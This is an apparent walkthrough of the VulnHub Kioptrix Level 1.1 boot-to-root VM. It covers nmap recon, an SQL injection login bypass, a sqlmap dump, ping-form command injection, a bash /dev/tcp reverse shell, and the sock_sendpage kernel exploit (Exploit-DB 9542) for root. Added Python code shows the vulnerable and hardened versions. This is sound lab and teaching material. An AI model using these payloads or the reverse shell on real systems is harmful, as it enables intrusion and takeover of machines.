Kioptrix: Level 1.1 Walkthrough

Kioptrix Level 1.1 (the second Kioptrix VM; its hostname turns out to be kioptrix.level2) is a boot-to-root virtual machine hosted on VulnHub.

Description of the challenge
“This Kioptrix VM Image are easy challenges. The object of the game is to acquire root access via any means possible (except actually hacking the VM server or player). The purpose of these games is to learn the basic tools and techniques in vulnerability assessment and exploitation. There are more ways than one to successfully complete the challenges.”

Identify the IP address of the Kioptrix machine
Nmap ping scan of the local /24

root@kali:~# nmap -sn 192.168.1.10/24
Starting Nmap 7.25BETA2 ( https://nmap.org ) at 2017-05-11 23:49 EDT
Nmap scan report for 192.168.1.1
Host is up (0.0086s latency).
MAC Address: A0:63:91:F0:CC:4B (Netgear)
Nmap scan report for 192.168.1.2
Host is up (0.068s latency).
MAC Address: 70:70:0D:C9:AD:78 (Unknown)
Nmap scan report for 192.168.1.3
Host is up (0.072s latency).
MAC Address: B0:DF:3A:DE:59:08 (Samsung Electronics)
Nmap scan report for 192.168.1.7
Host is up (0.072s latency).
MAC Address: 70:77:81:C0:6C:33 (Hon Hai Precision Ind.)
Nmap scan report for 192.168.1.11
Host is up (0.00040s latency).
MAC Address: F4:0F:24:33:5E:D1 (Unknown)
Nmap scan report for 192.168.1.12
Host is up (0.16s latency).
MAC Address: 04:56:04:47:D4:5C (Unknown)
Nmap scan report for 192.168.1.13
Host is up (0.061s latency).
MAC Address: 68:37:E9:88:16:5F (Unknown)
Nmap scan report for 192.168.1.15
Host is up (0.15s latency).
MAC Address: 80:3F:5D:21:DC:73 (Winstars Technology)
Nmap scan report for 192.168.1.18
Host is up (0.00041s latency).
MAC Address: 08:00:27:00:D6:A2 (Oracle VirtualBox virtual NIC)

Nmap scan report for 192.168.1.16
Host is up.
Nmap done: 256 IP addresses (10 hosts up) scanned in 2.83 seconds
root@kali:~#

The host with the Oracle VirtualBox virtual NIC, 192.168.1.18, is the target VM; 192.168.1.16, reported without a MAC address, is the Kali host itself.

Identify services running on Kioptrix (full TCP port range, service and OS detection)

root@kali:~# nmap -sT -sV -A -O -v -p 1-65535 192.168.1.18
Starting Nmap 7.25BETA2 ( https://nmap.org ) at 2017-05-11 23:50 EDT
NSE: Loaded 140 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 23:50
Completed NSE at 23:50, 0.00s elapsed
Initiating NSE at 23:50
Completed NSE at 23:50, 0.00s elapsed
Initiating ARP Ping Scan at 23:50
Scanning 192.168.1.18 [1 port]
Completed ARP Ping Scan at 23:50, 0.04s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 23:50
Completed Parallel DNS resolution of 1 host. at 23:50, 0.01s elapsed
Initiating Connect Scan at 23:50
Scanning 192.168.1.18 [65535 ports]
Discovered open port 22/tcp on 192.168.1.18
Discovered open port 111/tcp on 192.168.1.18
Discovered open port 443/tcp on 192.168.1.18
Discovered open port 3306/tcp on 192.168.1.18
Discovered open port 80/tcp on 192.168.1.18
Discovered open port 888/tcp on 192.168.1.18
Discovered open port 631/tcp on 192.168.1.18
Completed Connect Scan at 23:50, 3.10s elapsed (65535 total ports)
Initiating Service scan at 23:50
Scanning 7 services on 192.168.1.18
Completed Service scan at 23:50, 12.05s elapsed (7 services on 1 host)
Initiating OS detection (try #1) against 192.168.1.18
NSE: Script scanning 192.168.1.18.
Initiating NSE at 23:50
Completed NSE at 23:50, 1.51s elapsed
Initiating NSE at 23:50
Completed NSE at 23:50, 0.01s elapsed
Nmap scan report for 192.168.1.18
Host is up (0.0024s latency).
Not shown: 65528 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 3.9p1 (protocol 1.99)
| ssh-hostkey:
| 1024 8f:3e:8b:1e:58:63:fe:cf:27:a3:18:09:3b:52:cf:72 (RSA1)
| 1024 34:6b:45:3d:ba:ce:ca:b2:53:55:ef:1e:43:70:38:36 (DSA)
|_ 1024 68:4d:8c:bb:b6:5a:bd:79:71:b8:71:47:ea:00:42:61 (RSA)
|_sshv1: Server supports SSHv1
80/tcp open http Apache httpd 2.0.52 ((CentOS))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.0.52 (CentOS)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
111/tcp open rpcbind 2 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2 111/tcp rpcbind
| 100000 2 111/udp rpcbind
| 100024 1 885/udp status
|_ 100024 1 888/tcp status
443/tcp open ssl/http Apache httpd 2.0.52 ((CentOS))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.0.52 (CentOS)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Issuer: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Public Key type: rsa
| Public Key bits: 1024.0
| Signature Algorithm: md5WithRSAEncryption
| Not valid before: 2009-10-08T00:10:47
| Not valid after: 2010-10-08T00:10:47
| MD5: 01de 29f9 fbfb 2eb2 beaf e624 3157 090f
|_SHA-1: 560c 9196 6506 fb0f fb81 66b1 ded3 ac11 2ed4 808a
|_ssl-date: 2017-05-12T07:50:54+00:00; +3h59m59s from scanner time.
| sslv2:
| SSLv2 supported
| ciphers:
| SSL2_DES_192_EDE3_CBC_WITH_MD5
| SSL2_RC4_64_WITH_MD5
| SSL2_RC4_128_WITH_MD5
| SSL2_DES_64_CBC_WITH_MD5
| SSL2_RC2_128_CBC_WITH_MD5
| SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
|_ SSL2_RC4_128_EXPORT40_WITH_MD5
631/tcp open ipp CUPS 1.1
| http-methods:
| Supported Methods: GET HEAD OPTIONS POST PUT
|_ Potentially risky methods: PUT
|_http-server-header: CUPS/1.1
|_http-title: 403 Forbidden
888/tcp open status 1 (RPC #100024)
3306/tcp open mysql MySQL (unauthorized)
MAC Address: 08:00:27:00:D6:A2 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.30
Uptime guess: 49.710 days (since Thu Mar 23 06:49:09 2017)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=196 (Good luck!)
IP ID Sequence Generation: All zeros
Host script results:
|_clock-skew: mean: 3h59m59s, deviation: 0s, median: 3h59m59s
TRACEROUTE
HOP RTT ADDRESS
1 2.40 ms 192.168.1.18
NSE: Script Post-scanning.
Initiating NSE at 23:50
Completed NSE at 23:50, 0.00s elapsed
Initiating NSE at 23:50
Completed NSE at 23:50, 0.00s elapsed
Post-scan script results:
| clock-skew:
|_ 3h59m59s: Majority of systems scanned
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 18.82 seconds
Raw packets sent: 20 (1.626KB) | Rcvd: 16 (1.338KB)
root@kali:~#

Port 22 — Inspecting SSH — OpenSSH 3.9p1

root@kali:~# ssh kioptrix@192.168.1.18
The authenticity of host '192.168.1.18 (192.168.1.18)' can't be established.
RSA key fingerprint is SHA256:Zq28DlOuxHlI/iW0Vc2YhWhgPE3oB7O8kwSB4scwMzk.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '192.168.1.18' (RSA) to the list of known hosts.
kioptrix@192.168.1.18's password:
Permission denied, please try again.
kioptrix@192.168.1.18's password:
Permission denied, please try again.
kioptrix@192.168.1.18's password:

No OpenSSH exploit matching this version was found; Exploit-DB entries 21578 and 21579 looked promising but target older OpenSSH releases. The server does still accept SSH protocol 1 (nmap reported "Server supports SSHv1"), which is worth flagging in a report even though it gives no foothold here.

Port 80/443 — Apache httpd 2.0.52 ((CentOS))

We are presented with an admin login panel. Let's try a basic SQL injection on the form:

Username : admin
Password : ' or 1=1--

We successfully bypassed the admin portal. One caveat for anyone reproducing this against MySQL: -- is only treated as a comment when it is followed by whitespace, so if the payload is rejected, add a trailing space or use # instead. Let's confirm and exploit the injection with sqlmap and dump the database:

root@kali:~# sqlmap -u "http://192.168.1.18/index.php" --dbms=MySQL --dump --data "uname=test&psw=pass" --level=5 --risk=3
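To see why the payload works, here is an added Python reconstruction of the login check. It is not the VM's PHP (the real index.php was never read): the table name, column names and rows are assumptions, and an in-memory SQLite database stands in for MySQL. The unsafe version concatenates the submitted fields into the query, which is the shape an injectable login must have; the safe version binds them as parameters. SQLite, unlike MySQL, does not require whitespace after --, so the page's payload works here exactly as typed.

```python
import sqlite3

# Constructed sample data standing in for the VM's MySQL 'users' table.
# Table layout, column names and rows are assumptions for this example.
CONSTRUCTED_USERS = [
    ("admin", "example-password-1"),
    ("john", "example-password-2"),
]


def make_db() -> sqlite3.Connection:
    """In-memory SQLite database seeded with the constructed users."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, password TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?)", CONSTRUCTED_USERS)
    return db


def build_query_unsafe(uname: str, psw: str) -> str:
    """The string-concatenated query an injectable PHP login typically builds."""
    return ("SELECT username FROM users "
            f"WHERE username = '{uname}' AND password = '{psw}'")


def login_unsafe(db: sqlite3.Connection, uname: str, psw: str):
    """Deliberately vulnerable: returns the first matched username, else None."""
    try:
        row = db.execute(build_query_unsafe(uname, psw)).fetchone()
    except sqlite3.Error:
        return None  # a broken query simply fails the login
    return row[0] if row else None


def login_safe(db: sqlite3.Connection, uname: str, psw: str):
    """Parameterised query: the driver sends values separately, so quotes and
    comment markers in the input can never change the statement's structure."""
    row = db.execute(
        "SELECT username FROM users WHERE username = ? AND password = ?",
        (uname, psw),
    ).fetchone()
    return row[0] if row else None


def demo() -> dict:
    """Runs the page's payload against both versions and returns the outcomes."""
    db = make_db()
    payload = "' or 1=1--"  # the password the walkthrough submits
    return {
        "query": build_query_unsafe("admin", payload),
        "unsafe_bypass": login_unsafe(db, "admin", payload),
        "unsafe_username_field": login_unsafe(db, payload, "anything"),
        "safe_bypass": login_safe(db, "admin", payload),
        "safe_real_creds": login_safe(db, "admin", "example-password-1"),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

The "query" entry shows the statement the server actually ran: the password comparison is closed off with an empty string, or 1=1 makes the WHERE clause true for every row, and -- comments out the dangling quote. Injecting through the username field works just as well, which is why sqlmap is pointed at both POST parameters.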

After a successful login we are presented with a form that pings an IP address or hostname.

Try pinging www.google.com to confirm the form works as intended.

Now test the form for command injection by appending a second command after a semicolon:

www.google.com;ls

If a directory listing comes back alongside the ping output, the input reaches a shell unsanitised. The next step is a reverse shell through the same injection point. Start a netcat listener on port 1234 on the Kali host (192.168.1.16), then submit:

;bash -i >& /dev/tcp/192.168.1.16/1234 0>&1
bash-3.00$ pwd
/var/www/html
bash-3.00$ ls
index.php
pingit.php
bash-3.00$ cat /etc/redhat-release
CentOS release 4.5 (Final)
bash-3.00$ uname -a
Linux kioptrix.level2 2.6.9-55.EL #1 Wed May 2 13:52:16 EDT 2007 i686 i686 i386 GNU/Linux
bash-3.00$ cat /proc/version
Linux version 2.6.9-55.EL (mockbuild@builder6.centos.org) (gcc version 3.4.6 20060404 (Red Hat 3.4.6-8)) #1 Wed May 2 13:52:16 EDT 2007
bash-3.00$
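The injection works because pingit.php hands the submitted host straight to a shell. As an added illustration (Python, not the VM's PHP; the real handler was never read), here is that pattern beside a hardened one. The ping binary is replaced with echo so the example runs offline and without raw-socket privileges; the two payloads are the ones used above, copied verbatim.

```python
import ipaddress
import re
import subprocess

# 'echo' stands in for the real ping binary so the example runs offline and
# without raw-socket privileges; it prints the command line it would have run.
PING_STUB = "echo ping -c 3"

# The walkthrough's payloads, verbatim.
LISTING_PAYLOAD = "www.google.com;ls"
REVERSE_SHELL_PAYLOAD = ";bash -i >& /dev/tcp/192.168.1.16/1234 0>&1"


def ping_unsafe(target: str) -> str:
    """Deliberately vulnerable: the input is pasted into a shell command line,
    the way a PHP shell_exec("ping -c 3 " . $_POST['ip']) does it. Anything
    after ';' becomes a second command."""
    out = subprocess.run(f"{PING_STUB} {target}", shell=True,
                         capture_output=True, text=True)
    return out.stdout


# Hostname labels: alphanumeric, hyphens only inside, dots between labels.
# Rejecting a leading '-' also blocks option injection (e.g. a target of "-f").
HOSTNAME_RE = re.compile(
    r"^[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
    r"(?:\.[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?)*$"
)


def is_valid_target(target: str) -> bool:
    """Allow-list check: an IP address or a plain DNS hostname, nothing else."""
    try:
        ipaddress.ip_address(target)
        return True
    except ValueError:
        pass
    return len(target) <= 253 and HOSTNAME_RE.match(target) is not None


def ping_argv(target: str) -> list:
    """Builds an argv list; validation happens first and no shell is involved."""
    if not is_valid_target(target):
        raise ValueError(f"invalid ping target: {target!r}")
    return ["ping", "-c", "3", target]


def ping_safe(target: str) -> str:
    """Hardened handler: validated input, argv list, no shell.
    'echo' again stands in for the ping binary."""
    out = subprocess.run(["echo", *ping_argv(target)],
                         capture_output=True, text=True)
    return out.stdout


if __name__ == "__main__":
    print(ping_unsafe(LISTING_PAYLOAD))  # the echoed ping line, then a directory listing
    for payload in (LISTING_PAYLOAD, REVERSE_SHELL_PAYLOAD):
        print(repr(payload), "accepted:", is_valid_target(payload))
    print(ping_safe("192.168.1.1"), end="")
```

Escaping (escapeshellarg in PHP, shlex.quote in Python) would also stop the ';' trick, but the allow-list plus argv form is the stronger fix: it removes the shell entirely, so there is no quoting to get wrong, and the leading-hyphen rule keeps a "target" from being parsed as a ping option.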

Search for a local privilege escalation for CentOS 4.5 on kernel 2.6.9-55.EL. Exploit-DB entry 9542 (the sock_sendpage() NULL-pointer-dereference exploit for CVE-2009-2692, which covers 2.6 kernels up to 2.6.30.4) fits, so copy it into a working directory and serve it over HTTP for the target to fetch:

root@kali:~/Desktop/B2R# cp /usr/share/exploitdb/platforms/linux/local/9542.c .
root@kali:~/Desktop/B2R# python -m SimpleHTTPServer

Serving HTTP on 0.0.0.0 port 8000 ...
192.168.1.18 - - [12/May/2017 02:35:02] "GET /9542 HTTP/1.0" 200 -
192.168.1.18 - - [12/May/2017 02:36:08] "GET /9542.c HTTP/1.0" 200 -

The GET lines show the target fetching 9542.c from the Kali web server. After compiling it on the target and running the resulting binary, we are root!
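The step from uname output to a candidate exploit is worth automating for the next box. This added Python helper (not from the page or from Exploit-DB) parses the kernel release string captured above and checks it against the upstream ranges NVD lists for CVE-2009-2692; the affected ranges are taken from that description and are the only external facts assumed.

```python
import re

# uname -a output captured on the target in the walkthrough (copied from the page).
UNAME_A = ("Linux kioptrix.level2 2.6.9-55.EL #1 Wed May 2 13:52:16 EDT 2007 "
           "i686 i686 i386 GNU/Linux")

# Upstream ranges affected by CVE-2009-2692 (sock_sendpage() NULL pointer
# dereference, the bug Exploit-DB 9542 targets), per the NVD description:
# 2.4.4 through 2.4.37.4 and 2.6.0 through 2.6.30.4.
SOCK_SENDPAGE_RANGES = [
    ((2, 4, 4), (2, 4, 37, 4)),
    ((2, 6, 0), (2, 6, 30, 4)),
]


def parse_kernel_release(text: str) -> tuple:
    """Extracts the upstream version tuple from 'uname -r' or 'uname -a' text.
    '2.6.9-55.EL' -> (2, 6, 9); the vendor suffix after '-' is ignored."""
    m = re.search(r"\b(\d+\.\d+\.\d+(?:\.\d+)?)", text)
    if not m:
        raise ValueError("no kernel version found")
    return tuple(int(p) for p in m.group(1).split("."))


def in_range(version: tuple, low: tuple, high: tuple) -> bool:
    """Inclusive comparison; shorter tuples compare as if padded with zeros."""
    width = max(len(version), len(low), len(high))

    def pad(v: tuple) -> tuple:
        return v + (0,) * (width - len(v))

    return pad(low) <= pad(version) <= pad(high)


def sock_sendpage_candidate(uname_text: str) -> bool:
    """True if the upstream kernel version falls inside the affected ranges.
    Distribution kernels (the '-55.EL' here) may carry backported fixes that
    never bump this number, so treat a hit as a lead to verify, not a proof."""
    version = parse_kernel_release(uname_text)
    return any(in_range(version, lo, hi) for lo, hi in SOCK_SENDPAGE_RANGES)


if __name__ == "__main__":
    print(parse_kernel_release(UNAME_A), "candidate:", sock_sendpage_candidate(UNAME_A))
```

The backport caveat matters in practice: Red Hat and CentOS ship fixes under the same 2.6.9 base number, so the build suffix and the distribution's errata are what settle whether the exploit will actually work. On this box the May 2007 build predates the August 2009 disclosure, and the root shell confirms it.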
